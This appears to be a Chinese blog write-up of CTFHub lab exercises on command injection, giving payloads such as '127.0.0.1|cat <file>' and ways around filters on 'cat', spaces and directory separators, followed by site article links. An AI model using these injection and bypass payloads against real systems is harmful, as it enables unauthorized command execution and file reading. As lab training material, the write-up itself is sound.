ctfhub rce 命令注入 过滤cat 过滤空格 过滤目录分隔符
2024-08-27 21:10:56
命令注入
源码直接给了出来尝试127.0.0.1;ls
发现一串数字的php文件cat查看
127.0.0.1|cat 233382768628619.php
查看源码发现flag
过滤cat
这题和上一题差不多只不过把cat给过滤掉了,过滤了cat我们可以用一下几种方法绕过
tac 从最后一行倒序显示内容,并将所有内容输出
more 根据窗口大小,一页一页的现实文件内容
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head 只显示头几行
tail 只显示最后几行
nl 类似于cat -n,显示时输出行号
tailf 类似于tail -f
使用127.0.0.1|tail (flag文件名)
查看源码发现flag
过滤空格
源码直接给了出来发现把空格给过滤了
使用127.0.0.1|ls
查看flag
127.0.0.1|cat<flag_7294130653.php
过滤目录分隔符
源码将\过滤掉了
使用127.0.0.1|ls
127.0.0.1;cd flag_is_here;ls
然后直接cat得出flag
127.0.0.1;cd flag_is_here;cat flag_30272158003930.php
得出flag
还有部分晚点再发今天就暂时分享这么多
最新文章
- Android LayoutInflater.inflate(int resource, ViewGroup root, boolean attachToRoot)的参数理解
- .NET委托和事件
- ubuntu 安装MTK 移动终端usb驱动
- Nginx配置文件详细说明
- WIN8系统安装软件时提示";扩展属性不一致";的解决方法
- LeetCode(四)
- C++ Copy Elision
- 转:python webdriver API 之操作测试对象
- sqlserver重命名字段名称
- xampp
- Android Framework------之Input子系统
- Java如何将Exception.printStackTrace()转换为String输出
- Egret 矢量绘图、遮罩、碰撞检测
- 队列(链式存储)JAVA代码
- JavaScript表单验证年龄
- .Net——使用.net内置处理程序处理自己定义节点Demo
- MaidSafe.net,一个完全去中心的化的云存储系统
- listener.ora中PLSExtPro 和ExtProc的作用(转)
- Robotium源码分析之运行原理
- adobe air for ios 例子
热门文章
- 解决gpg failed to sign the data fatal: failed to write commit object解决方案
- shell中echo基础及高级用法详解-渐入佳境
- selenium+python自动化101-使用execute_script() 方法获取 JavaScript 返回值
- 命令行窗口cmd:访问C盘根目录和其他盘
- 解决 “Project ERROR: Unknown module(s) in QT: webengine”以及“Your MaintenanceTool appears to be older than 3.0.2. .” 的办法
- WPS:Excel删除指定行以后的所有行
- (转载)虚拟化(3):os调度策略。
- django程序在windows服务器上发布
- oracle 中的decode函数
- Mysql基础语法-建库-建表(增、删、改、查、表关联及子查询)